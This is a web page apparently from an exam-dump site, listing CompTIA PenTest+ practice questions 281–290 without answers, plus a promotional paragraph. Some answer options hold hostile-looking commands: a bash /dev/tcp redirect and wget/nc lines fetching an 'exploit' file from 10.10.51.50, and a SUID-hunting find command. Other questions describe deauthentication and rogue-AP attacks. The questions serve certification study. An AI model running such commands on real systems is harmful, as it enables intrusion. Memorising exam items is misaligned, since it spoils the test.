Exam Details

  • Exam Code
    :PT0-002
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :455 Q&As
  • Last Updated
    :Apr 13, 2025

CompTIA CompTIA Certifications PT0-002 Questions & Answers

  • Question 281:

    A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.

    In which of the following places should the penetration tester look FIRST for the employees' numbers?

    A. Web archive

    B. GitHub

    C. File metadata

    D. Underground forums

  • Question 282:

    A penetration tester runs the following command on a system:

    find / -user root -perm -4000 -print 2>/dev/null Which of the following is the tester trying to accomplish?

    A. Set the SGID on all files in the / directory

    B. Find the /root directory on the system

    C. Find files with the SUID bit set

    D. Find files that were created during exploitation and move them to /dev/null

  • Question 283:

    A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?

    A. Include the findings in the final report.

    B. Notify the client immediately.

    C. Document which commands can be executed.

    D. Use this feature to further compromise the server.

  • Question 284:

    Which of the following tools would be best suited to perform a cloud security assessment?

    A. OpenVAS

    B. Scout Suite

    C. Nmap

    D. ZAP

    E. Nessus

  • Question 285:

    A penetration tester ran the following command on a staging server:

    python –m SimpleHTTPServer 9891

    Which of the following commands could be used to download a file named exploit to a target machine for execution?

    A. nc 10.10.51.50 9891 < exploit

    B. powershell –exec bypass –f \\10.10.51.50\9891

    C. bash –i >and /dev/tcp/10.10.51.50/9891 0and1>/exploit

    D. wget 10.10.51.50:9891/exploit

  • Question 286:

    A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

    A. Send deauthentication frames to the stations.

    B. Perform jamming on all 2.4GHz and 5GHz channels.

    C. Set the malicious AP to broadcast within dynamic frequency selection channels.

    D. Modify the malicious AP configuration to not use a pre-shared key.

  • Question 287:

    A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of- service attack on the network segment?

    A. Smurf

    B. Ping flood

    C. Fraggle

    D. Ping of death

  • Question 288:

    Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

    A. Analyze the malware to see what it does.

    B. Collect the proper evidence and then remove the malware.

    C. Do a root-cause analysis to find out how the malware got in.

    D. Remove the malware immediately.

    E. Stop the assessment and inform the emergency contact.

  • Question 289:

    A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.

    Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

    A. SQLmap

    B. Nessus

    C. Nikto

    D. DirBuster

  • Question 290:

    A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees.

    Which of the following tools can help the tester achieve this goal?

    A. Metasploit

    B. Hydra

    C. SET D. WPScan

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.